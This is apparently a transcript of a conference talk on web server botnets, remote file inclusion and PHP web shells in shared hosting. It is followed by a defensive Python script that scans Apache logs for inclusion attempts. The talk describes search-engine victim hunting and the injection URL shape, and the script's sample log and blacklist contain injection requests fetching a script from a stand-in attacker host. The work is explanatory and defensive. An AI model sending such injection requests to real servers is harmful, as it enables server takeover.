Good morning. I hope you all had a good day's sleep. I hope your headache isn't killing you too much. And if you don't have a headache, you're doing that wrong. Sorry, but... So, thank you for coming, and let's get started. The name of the talk, as you can all read, is basically "Web Server Botnets and Hosting Farms as Attack Platforms". If you expected a botnet talk, which I never give, this is semi-botnets. It's not really. The real name of this talk should probably be "Completely Cross-Platform Web Malware". It's not. So, let's just get started.

Who am I? My name is Gadi. Hi. Nice to meet you. Hey! I do a lot of stuff that's related to botnets, fuzzing, all around, really. And I work for an Israeli company called Beyond Security. A lot of vulnerability assessment.

So, let's get started. Regular malware. And, guys, I'm really using simple definitions here. So, if you're in the antivirus world, do not kill me, please. I'm just trying to get some basics going around. So, regular malware, and this is a disclaimer so nobody can say I'm wrong. Often. Okay, anybody can say I'm wrong, but you get the point. So, platform-specific, meaning it's written first for the operating system, right? It would run on Windows, it would run on Linux, or whatever other platform you would like. So, that's the code, the binary code. It's compiled for that, or whatever else you want to call it today. Then, it propagates. I believe most definitions would say most malware propagates. Of course, not always. Trojan horses don't need to propagate, but you get the point. They can use... sorry? I would actually like to hear that comment, if you can please share it with the rest of us. How dare you? I always wanted to say that. Okay. This is DEF CON. So, I'm going to take my regular talk and insert a lot of "fuck, shit, asshole". Fuck, shit, asshole. So, if anybody... No, seriously, if anybody... Shut up. So, if anybody is offended in any way, I would honestly like to apologize to you and ask you to leave the room.
This is DEF CON, and this is the way I'm going to speak, and I apologize if you don't like me, but hey, if the world doesn't... So, let's go through this. Let's get started. So, platform-specific, yeah. It propagates using vulnerabilities, you know, web server, mail client, remote accessible service. And you can also use social engineering, or user gullibility, or stupidity, for DEF CON. And, you know, send you some email saying, hey, this is a really cool picture, you got to click on that, and they would. Everybody knows that. And here are some things that are not always true. It propagates randomly, meaning I can choose some addresses by some other means, but usually I'll just try and get as many samples out there as I can by blindly trying to infect everybody, and then some. And then usually, although there is no technological reason for this to be different, if not always, it would infect desktop systems. I can infect the server, but mostly the systems that will get infected by these viruses, malware, whatever you want to call them, are desktops.

So, web server malware. Completely cross-platform, as long as there is actually a web server over there that supports scripting. It propagates by the use of Google. I'm sorry, I like Google. Any search engine. But this is DEF CON, and... But usually these people use Google. And you can try searching any search engine for "powered by phpBB". Actually, now Google has this thing, autocomplete, so just do "powered by" and see the list of stuff that pops up. Really interesting. So you search Google, find some web application that you know has vulnerabilities, and blindly try to infect them. And these are... And other differences. It propagates from a pre-selected genetic pool. Again, not always. There are other ways of doing this. You can just blindly go and try to attack different servers. Are you actually filming me? No? Okay, so that light is nothing to do with... Anybody been here at DEF CON in 2005? Anybody gone to the Mudge talk?
Yeah? No? It's Mudge; there was no abstract. But let's go back to the issue. And it infects servers, which means it can infect desktops. It's not very likely, because most desktops should not run web servers. But it usually infects servers rather than desktops. So here is an example of some simple script where you just enter the string you're looking for in Google or some other search engine, MSN, Yahoo, etc., and you find a ton of victims. Pretty neat. It could be done manually, but this is cool. inurl:, by the way, is a very powerful search tool.

So let's just look at what this means. Malware, bots, etc. So web malware is cross-platform. And so far, this is the interesting part: it has infected a ton, and by ton I mean thousands and thousands of web servers, all out there already to be controlled. Not DSL machines, not dial-up machines. I'm not saying these botnets are gone. But web servers. And what the attack platform means, and again, if you don't remember, this is actually the name of the talk, is lots of web servers. Just consider all these co-location facilities, the server farms, hosting providers, an unbelievable amount of servers with a lot of users on the same machine. And if even one of them runs some insecure web application, which we all know happens, and this is still kind of obvious, then the entire server is compromised.

Just to be clear about this presentation, I'm going to talk about a lot of stuff we already know. And let's just go over the stuff we already know. So there's been a lot of work about PHP shells. It doesn't have to be necessarily PHP. It could be ASP. It can be written in Perl, as far as I'm concerned. And generally, very well explored; we all heard about them, or should have. Inclusion attacks, or RFI, thoroughly explored. And we have seen a lot of shells, actual shells out there, such as the R57 shell, or, as Joe Stewart called it, SpamThru, which was very interesting.
He actually showed an entire botnet that sends a lot of spam, about 57,000 servers sending a ton of spam out there. Most of it was shares, running shares, or stocks, whatever you want to call them. And this was done purely by these web servers on the R57 shell. Guys, if you want to go all the way to the back, because I can hear you. Yeah, yeah, you too, up in the front. Okay, let me try this. Hello! Yeah, you too. Thank you. No, no problem. Can you share? What does the bag look like? Oh, hey. There is a reward for a bag. Anybody has a bag? Or is anybody a douche? I don't care.

So, other... I mean, PHP shells. Okay, let's get started. PHP shells. I don't know if you've been to any of my talks before. Five minutes, and I just speak shit out of my ass. So, you're leaving now. You only cared about your bag. Okay. So, PHP shells we know of. RFI attacks we know of. R57 shell, which was analyzed. We have seen these shells and actually looked at them. We know of them. So, why am I talking about this again? Why am I talking about this together? So, there is no other significant work, or no work whatsoever, done in this field up to a few months ago, which was in February, when the paper this presentation is based on was written. There have been some works by a guy named Jamie Riden, I hope I pronounced his name right, about web... but nothing really significant beyond that. So, new work. There is my work in cooperation with, which is "Web Server Botnets and Server Farms as Attack Platforms". That was in Virus Bulletin in February. And, of course, the great guys in the Honeynet Project with "Know Your Enemy: Web Application Threats". The web server threats with shells was a very small portion of the work, but still very interesting. Good guys.

And now let's talk about why this is even interesting. Why this is new. So, the injection. Okay, I'm not talking about this as new. The injection. So, let's actually read this. File inclusions are vulnerabilities... Okay, let's not read this.
File inclusions are vulnerabilities in web applications which can allow an attacker to execute a script by including a file in an existing script. Okay, blah, blah, blah. There is an include command, constink xss right across the scripting, that's one instruction or something like that. And there are other types of vulnerabilities, in POST, in the URL, any type of vulnerability you want to think about that can also help you include code. And we even have file upload vulnerabilities. Anybody has file upload enabled in their web application blog? Not a very good idea. After a lot of discussions and arguments, we decided to enable file upload in a blog I hope to contribute to, and the very next day we got compromised, because apparently somebody that actually secured the file upload issue made sure that people who reached the script could use it, because the authentication test was commented out. You never know. Never trust uploads from the web.

So, injection. You inject entire scripts into the current code. We know of that. And what do injections look like? As you can see here, for example, you have whatever URL you've got, right? This is a URL, because it has two URLs in it. And you basically use the script, you include some other something that's going on from badguy.tod malware.cmd, and badguy.tod is basically where the bad script will be hosted, and you injected it. No matter what exact vulnerability we're actually talking of right now, it could be in WordPress, it could be in phpBB, this is how most of them look, and the result in PHP code, actually this should be the other way around, the PHP code is above, but this is what it will look like. GET and the page, right? Inside your script. And the interesting thing is, whatever this may look like, it actually causes your web server to act like a client. You go out and you download a script to your web server. Your web server surfs the net.
Now, unrelated to this particular threat of file inclusions, why should you allow your web server to surf the net? Basic rules. If we all followed the basic rules we would have no problems. So, main types of web server malware. We've got a lot of scripts out there. Just consider, in the past, when you wanted to have control of the server, you would maybe have a shell. Maybe you have the computer connect to you as a connect-back shell. But all these nice guys just came out and said, well, you know this old web thing going on now, with web applications and maybe Web 2.0? And why should we have to type? Especially when there is a port that's always open because it needs to serve the public. That's port 80. We can connect to the web server, type in a URL to a file we injected into the web server, and have a GUI, a web GUI, a user interface for our shell. That's much cooler, isn't it? Again, nothing new there.

So we have other types, not just shells. We have what I call foothold grabbers, which are beachheads, basically. Hey, you got control, now start uploading stuff and do whatever you want. We have the remote shell, which is basically a library compromise tool. Run this command, download that, upload that, do this, whatever you want to do. And then we are starting to get to what this lecture is actually about, which is the bot. If we can upload scripts to do whatever we want, and this would of course run with the privileges of the web server, why shouldn't we upload bots? These are servers, strong lines, strong machines. We can use them. And we can use them for different things. It could be anonymous messaging, right? Somebody's on the phone right here. Guys, if you want to talk, go to the back. The cool people sit at the back. I never sit at the front. So anonymous... did I just say I'm cool? That's deduction the Newton way. Okay, so you would have loved me. So anonymous messaging, you can spam, you can do defacements. Consider where this all started.
Anybody ever visit Zone-H? Shut up, warning wood. So all these defacements out there, people figured, hey, why should we just deface the page? Are you videotaping me? Can you turn off the blinking thing at least? No? Thank you. So why should we just deface these websites? We're a Chinese government organization. Or if it's a website for some club, a biking club in San Diego, we should be able to do more with this. This is a resource. Let's use it. Web 3.0. I don't think so, no. At RSA, actually, somebody came and said, so what I've learned in this conference is Identity 2.0. And I was, oh my God. Identity 2.0.

So anonymous messaging, spam, defacements, and then let's make use of all this. Let's use these web servers that are so easy to hack into and get a bot in there. Or not. We can do things that are much easier. Just upload some sort of shell that lets us spam. And it lets us spam many different emails, and we can copy-paste these emails in. Or not. Let's do something else. Yeah, same thing. Okay, it's not exactly the same thing, but it's in a different language. This is interesting. Your email, reply-to, blah blah blah, and then all the way on the other side of the room now. So all the way on the other side of the room you'll have to figure it out for yourselves. Over there on the right there is "load addresses from MySQL", or, for those not in the States, MySQL. Isn't that cool? Now, this was actually the server I took this from; this shell connected to a server in France which had a lot of remote databases on it, of addresses. We're starting to see more advanced use now.

So let's look at this web shell. It's called C99 shell, and there's a lot of versions out there. I can't even begin to count them. Actually, I did: 33. I didn't count last month, and there's a lot of stuff that authors didn't write, and stuff like that. But as you can see here, we basically have a Linux machine running Apache, PHP 4.4.2, and this scrolls down; there are many other pages.
You can do pretty much whatever you want with that machine. It's yours, you own it. So I actually did kind of speak out my ass and discuss file injections and PHP shells. Where are the botnets? So let me ask you a very serious question. Can somebody tell me what a botnet is before I continue? In most cases, violate other people's systems and add an actual application, the route in the server, for some purpose you're... for some purpose you're... Did you say "gay" something? Oh, a web page. I hear out my ass. We're taking over some other servers, or collect the processes, run commands. Okay, let me define what a botnet is. Not that you're wrong. What you're wrong... and the reason is, definitions in the security industry are so much fun. We can define everything 20 different times for 20 different things, and we would always argue about it. The cheapest type of... well, anyway, what's a bot? Can anybody tell me what's a bot? A robot? What? A zombie machine? What? Software robot. Defining what a botnet is is something I'm still not able to do after over 10 years of working on it, because consider, it could be just one machine connecting to a command and control server being controlled. But it could be 10 machines all from the same net. Or let's consider if it's one machine and it has 2, 3, 20, 200 different samples of bots installed; it could be 20 different botnets. Not all these botnets are always active. So how do we find a bot? For now, let's define a bot as a trojan horse. Why?
Because it is a trojan horse, and I'm not going to really argue about the definitions. It is some sort of software, and this is taken from the something FAQ on Usenet, if I remember it correctly, I'm completely ruining it right now, I read it 10 years ago. It is some sort of software that, if you knew about it existing, or some of the things that it does, you would not approve of it as a user. That's a basic trojan horse. And let's add to that and say that most of these are remotely controlled, which means if you have a trojan horse, you own it. It's completely compromised, it's yours. Yes, you can't kick it when it doesn't work, but it's yours. You can pop the CD open, you can spam, you can anonymize everything through it, and that's fine. And then you say, I have 10 of these, I have 20 of these, I have 100 of these, I have a million of these. How do I control all of these together? It becomes a little bit of a logistical problem. All these different trojan-owned machines connect to me? That's not a very secure decision to make, because I can know who you are. Let's say you do it right. Now, you choose some server with a simple protocol, for example IRC, which is a chat protocol most of us are intimately aware of, and all these bots will connect there and say, hey, I'm owned, own me further. The server would be called a command and control server, a CNC, or a C2 if you're from the military. And that's what a botnet is to me, although it gets more complicated from that point on.

And the definition is important right now, because this is an example from about 6 months ago. This is a list, not a very large list, about 540K of a text file, and I can't read that, but they basically list their shells as the attack URL. As you can see, for example, the first one was a university in Taiwan, and they had some sort of web application running over there, you can see index.php, etc., and then you had the next one with the command.txt, which is the second URI, and that's the script they're injecting into that server. Makes any sense? They're not
listing the IP addresses, they're not listing the URLs, they're listing just the attack instructions, and this for them is a shell, which is very interesting. New malware discovered. Not so new anymore; this is the second time I've given this presentation in public, and it's not really supposed to be extremely technical, so I apologize if anybody is concerned. It's more about the scale. And there was a new version of C99 shell, C99 shell tool modified by Cyco (with a zero), and you'll find quite a bit of those. And we had, up to two months ago, about 243 unique samples. When I say unique, I don't mean somebody adding "this was created by Cyco" at the entrance, at the footer, or something like that, small changes that somebody just took it and it makes no sense, but completely different malware, or variants of. So 243. I ran it against a few antiviruses, and at the time only about 20-40% on average were detected, and half of that were detected wrongly. Now, I don't want to think about antivirus on the web server, for the web server, but okay.

For example, 3, and I'm quoting the guy because he was very, very excited: this on its own isn't new, but rather the way the program is delivered, by using PHP's eval function. And the new variant hides itself in a base64 encoded block of data which is also encrypted; the characters are rotated so they don't appear to be in plain text. Now, I don't know how many of you have ever seen this happening, especially on bank websites, but encryption which happens on the client side is not encryption. Any protection on the client side can be kicked or mutilated. But still, it's given us a lot of work. Instead of two minutes of reading the shell, we need to spend some two or three hours on it just to understand what's going on. But these guys finally noticed: hey, somebody is looking at us. Somebody realized we're taking all these different web servers and using them as bots, attack tools. And why is that interesting? So number two, which was this one, actually has a CNC channel. For
example, this is not as big as it used to be a few months ago, but you can Google search c100.php and you'll find a lot of the different CNCs on the web itself, through Google. And that's how it finds its command and control server: on web search. I'm sorry, which is something that we have not seen before at that point, at least me personally, not on this scale. And it was passworded. Again, there's nothing to notice that we care. I will tell you at this point, if you search for web shells you could find two blog entries, a discussion on the Incidents mailing list from 2005, a discussion on Bugtraq from early 2006, and some blog posts on Johnny Long's web server. Nobody cared.

So why is this important? Let's look: low-cost hosting. You have two to three, sometimes five or six thousand websites per box. Any user can run any web application, web applications mostly in PHP. Well, you know, open source, availability, PHP stuff, very cool. PHP has a ton of vulnerabilities, and I mean really. No, PHP is secure, no kidding. I mean insecure, no kidding. So open source, availability, PHP, PHP's bad security and ugly code. So combining the fact that... yes, what? ASP.NET? Okay, I never used ASP.NET, I never used PHP. But just consider, if you want low-cost hosting, you go and pay 5 bucks, 7 bucks, 15 bucks, 20 bucks, more than that and you're screwed, why are you paying for that, and you have some virtual hosting machine. Not even that, that will cost more. What am I talking about? You have a shared environment with thousands of other users, zero security, or close to zero security, because it won't pay for the provider to actually care about the security. It's really difficult for providers to care about security when they don't get paid for it. This is a problem. Really, for once I'm not being sarcastic. And then you share that server with so many different users, or webmasters, that love PHP. And how many PHP application vulnerabilities do we see on Bugtraq per week, until they started apparently filtering them? I don't feel very
secure suddenly, because if any of these websites is compromised, I'm compromised, the machine is compromised, and it's not good. So 3,000 users, any web application or script will run with the permission of the web server. How do you run your web server? Anybody here who runs the web server runs it not as root? Really? Good going for that con. Now tell me, once you're in the machine, how many local exploits are out there, just privilege escalation for the Linux kernel? Done with them. Once you have access, even if you don't have root, you'll get it, and if you don't, you'll usually be able to do whatever you want anyway. You don't need that much of a high access level. This is not about quality. This is not about owning that server like in the good old days and discovering what's on it and doing stuff through it. This is about quantity. And then, when you have so many different servers, you have DDoS tools. Just imagine the idea.

So what do we actually do about these attack platforms? Because this is really, really big. We can try to detect it. We can do VA scanning. I hate saying that because it sucks, but you can try running Nessus or something else that actually detects all these web things, and try and see how many of these things are on my box. Doesn't help you much, but hey, it's a start. You can look for known bots on the system. Guys, girls, I'm talking about antivirus for web servers. I'm sure that by this time next year we'll see one of the antivirus companies coming out with that. Patching: user responsibility. Do you want your user, who is paying five bucks per month, to be in charge of patching their own web applications, when honestly sometimes these web applications don't even have any patches out there? As you well know, a patch may not exist. Now, how much do you invest? Do you contact the user, and then just one of them? Do you patch the site, meaning do you go and actually look for every web application on the server and patch it and try to keep up with it? Not very possible. And what about the
server itself? Do many of these service providers even patch their own servers for OS vulnerabilities? You can do these things. They will help, but they're not perfect. They do not fit low-cost hosting. You cannot spend all that time. You can try and be reactive and treat some of these botnets, but honestly, some of what these have done: they patched their systems. They would choose, just for example, phpBB or some other well-known web applications that are problematic and just patch it out quietly without ever telling anybody. Not a very good solution. It works for them to a limited degree.

So there are some small things we can do to try and make this better. We can disable allow_url_fopen or allow_url_include in PHP, scriptable languages, but this is for PHP. We can try and run in a virtual environment or chroot users, but what's the cost? Yet again, pretty high. Doesn't really work. Don't allow surfing from a web server. My God, how many of us actually surf out of the firewalls, to patch the Check Point firewall or whatever firewall it is, because we download it from the web? We just look into our policies lately, if we are not the people who do this. Most firewalls surf the web, even if only to Check Point, or Juniper, or whoever else you want to choose out there, Cisco. Not a good idea. There is more security in other such devices, application firewalls, IDSs, etc. They help, but pretty much useless in this situation, in my opinion. Some of us may disagree. I believe application firewalls are pretty much useless anyway, but never mind. What are your best practices? What are your own? Do you allow your people to surf out? What are the things you do? So quietly patch web applications, or at least the most known ones. I'm not sure that's a really good solution. Many people will like it; it's the only thing that works so far, but it's not very good.

Now let's boil it down. A battlefield with no escalation by the good guys is bad. The attacker IP addresses, 85% of the time, were the same IP addresses. They did not
use bots. They did not use proxies. They did not try to hide themselves. The same people from the same IP addresses, again and again, over the course of a long time, would be the same attackers worldwide. Which means there is an entire field out there that, up to a few months ago, and still, just a few people are aware of, which is unbelievable. Unopposed escalation. Reactionary attacks, knee-jerk reactions, are never good, but sometimes it's the best that we can do. We can't wait for the silver bullet, or whatever you guys want to call it. So do we want to start an escalation battle? No. Do we want this battlefield of web server botnets to be completely ruled by the bad guys? Do we want our web servers all around the world to be infected? I mean, you guys are in security. Have you ever seen the attacker coming from the same IP address? Maybe. Have you ever seen them do it worldwide, from the same IP addresses, 85% of the time? When you look at your web server logs, you look for many different things, not for this. Many of your web servers, I'm not talking about PayPal, I'm not talking about Amazon.com, these are very low-hanging fruit vulnerabilities, and these vulnerabilities equal, plain and simple, remote code execution for web servers. And many of us are running these applications or basing our own applications on this. 85% of the time. We didn't even start the silly escalation war yet. So we can compare this to SMTP, the spam. Everybody was running around saying, close your open relays, this is not good, guys, do something about this. Spam ruled. Anti-spammers were few and far apart. This is pretty much where we are today, and the big guys don't have the money to cover it. And we can concentrate the problem to these providers, and in the news there have been at least two very large providers, thousands of web servers each of them, with that many websites, just this past year, that have completely been owned entirely, in the news. How often do these things get to the news? So we started the Web Honeynet Task
Force. Originally we called it the Web Honeynet Project, but we didn't want to get in trouble with the Honeynet guys, which are really nice guys. So we haven't really done much in the past few months. We searched our research projects and didn't really initiate any new ones, but we have 14 members, some of them are the biggest co-location facilities around. And what we figure is, if we gather this information, we can gather the malware, we can know about it, we can not just see what infects us but around the world, and prepare better for it. We can discover the command and control channels. All these botnets just move on to web servers; we are getting the same old IRC technology. We can go see solutions that actually work to a limited degree, like IP blacklists. Without blacklists, as evil as some of us may think they are, the internet would not be here. No, the internet is not going to die tomorrow. The sun will shine tomorrow. This is not a cry-wolf thing. IP blacklists really kept the mail servers alive, because they can't handle the load. URL blacklist: that's the simplest thing we can get. We can configure, if this is an attack by URLs, we can just blacklist these URLs, same as IP addresses. The same URLs are still being used. It's not as bad as it was a few months ago, but still. Web server antivirus. Oh, come on, they will rebrand antivirus for this. It's like McAfee keeps rebranding its IPS, so now they're rebranding it for botnets. It may work. I didn't like the idea, so not saying anything bad about them. So you can join if you like and do some research.

But let's talk about the impact. Just consider IIS botnets, Linux botnets. It's a new ballgame. It's not just, again, these are there and they are the main thing, all these DSL and broadband cable bots all around, they are the main problem, but this is a new ballgame. And this is from obvious to not so much. IIS botnets, that's what I want to do. So defacements, spam bots, stolen databases. Stolen databases are pretty important. Just consider, if you
have access to the web server, why deface it? You can take the database, that's useful. And to be honest, defacements, I don't know if you noticed on Zone-H, but some of these go away, and the reason I noticed is, about 6 months ago we started seeing forums, websites, legitimate websites that you would enter, and as an unsuspecting user you wouldn't even notice: hey, what is the animated cursor zero-day doing on my favorite forum, and why are they trying to infect everybody on the forum? That's the defacements of today. Unless you want to do something like, hey, you Israelis suck, or hey, you Palestinians suck, regular defacement type of stuff. Attack the web server, put in the malicious code, let users go on as usual. Just yet another way to infect people. It's all low-level noise. We can't respond to all these millions of incidents out there anymore. Just when something really big comes along do we respond to it. Really.

So what it is about, why this is new: it's the scale, it's the cost, and the fact that the bad guys just do whatever the fuck they want. And again, knowing about PHP scripts is fine, but there is close to no industry or community awareness of this. Again, it's DEF CON, I have to say it's fuck. Hey, hey. Questions?

Yeah, we did, we do see IIS botnets out there. He asked why do people not see IIS botnets, and I'm saying this is not a Linux problem. People do see IIS botnets, they are out there, you just need to look for them. You're not aware; prove me wrong. Other questions? Yes. SSL for command and control, how frequently? I have no idea. I can pull a number out of my ass, but I honestly haven't really followed this for a while. We can continue the conversation a little bit later. Other questions, anybody? Yes. Use botnets for legitimate purposes? Try distributed.net, I don't know. Yes, what? These are not published, but I have no reason to hide them. I have the paper available online, the one I wrote for Virus Bulletin, same title. I did not update it in a while. No, sorry. Other questions? Yeah, anybody?
Yes. I did not really distribute the primary sources of attack by countries, but since that matter... online, since when? I mean, yes, that's cool data, but I personally have not found it to be useful to see where the bots are located. What? Yes, sorry, I do not have that data available right here. Yes? Any questions? Thank you very much for listening, and I'm sorry I didn't say enough.
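As an added example, not from the talk or the task force's material, the following Python script does the log checking the talk says people are not doing: it scans Apache combined-log lines for the remote file inclusion shape shown in the injection slide (a query parameter whose value is an absolute URL to a script such as cmd.txt), normalizes the injected URL so it can be matched against a URL blacklist, and tallies attempts per source IP and per injected script, the two pivots the talk names (the same source IPs recurring, and URL blacklisting). The log lines, the blacklist, and the allowed-host list are all constructed for this example, using documentation addresses rather than real indicators.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-log sample (made up for this example; the IPs,
# hosts and paths are documentation values, not real indicators).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Aug/2007:03:12:44 -0700] "GET /forum/index.php?page=http://badguy.example/cmd.txt? HTTP/1.1" 200 1532 "-" "Mozilla/4.0"
203.0.113.7 - - [10/Aug/2007:03:12:45 -0700] "GET /blog/wp-content/plugins/x/y.php?path=http://badguy.example/cmd.txt HTTP/1.1" 404 312 "-" "Mozilla/4.0"
198.51.100.9 - - [10/Aug/2007:03:13:01 -0700] "GET /index.php?id=42 HTTP/1.1" 200 8801 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Aug/2007:03:14:10 -0700] "GET /gallery/main.php?inc=https://other.example/c100.txt HTTP/1.0" 200 1532 "-" "libwww-perl/5.805"
192.0.2.33 - - [10/Aug/2007:03:15:00 -0700] "GET /index.php?ref=http://www.example.com/ HTTP/1.1" 200 8801 "-" "Mozilla/5.0"
"""

# Assumed URL blacklist of known injected scripts, keyed as host/path (constructed).
URL_BLACKLIST = {"badguy.example/cmd.txt"}
# Assumed hosts that legitimately show up as absolute URLs in parameters (constructed).
ALLOWED_HOSTS = {"www.example.com"}

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
ABS_URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def parse_line(line):
    """Split one combined-log line into its fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def normalize_url(url):
    """Reduce an injected URL to lowercase host/path. The trailing '?' that
    attackers append (so the rest of the include path becomes a harmless query
    string) is stripped so both spellings hit the same blacklist entry."""
    parts = urlsplit(url.rstrip("?"))
    return parts.netloc.lower() + parts.path


def find_injected_urls(target):
    """Return (parameter, url) pairs whose value is an absolute URL, i.e. the
    ?page=http://.../cmd.txt shape of a remote file inclusion attempt."""
    query = urlsplit(target).query
    return [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)
            if ABS_URL_RE.match(value)]


def analyze_log(text, blacklist=URL_BLACKLIST, allowed_hosts=ALLOWED_HOSTS):
    """Scan log text for RFI attempts and summarize them by source IP and by
    injected script, the two things a hosting provider can act on."""
    attempts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        for param, url in find_injected_urls(rec["target"]):
            if urlsplit(url).netloc.lower() in allowed_hosts:
                continue  # known-good absolute URL, e.g. a referrer parameter
            key = normalize_url(url)
            attempts.append({
                "src": rec["src"], "ts": rec["ts"], "param": param,
                "script": rec["target"].split("?", 1)[0],
                "injected": key, "status": rec["status"],
                "blacklisted": key in blacklist,
            })
    return {
        "attempts": attempts,
        "by_source": Counter(a["src"] for a in attempts),
        "by_url": Counter(a["injected"] for a in attempts),
        "blacklisted": [a for a in attempts if a["blacklisted"]],
    }


if __name__ == "__main__":
    report = analyze_log(SAMPLE_LOG)
    for a in report["attempts"]:
        flag = "BLACKLISTED" if a["blacklisted"] else ""
        print(f'{a["src"]} {a["script"]} ?{a["param"]}= -> {a["injected"]} {flag}')
    print("attempts per source IP:", dict(report["by_source"]))
    print("attempts per injected script:", dict(report["by_url"]))
```

The HTTP status is kept on each attempt because a 200 on a vulnerable include is the case worth investigating first; a 404 only tells you the attacker guessed a path that does not exist on this box.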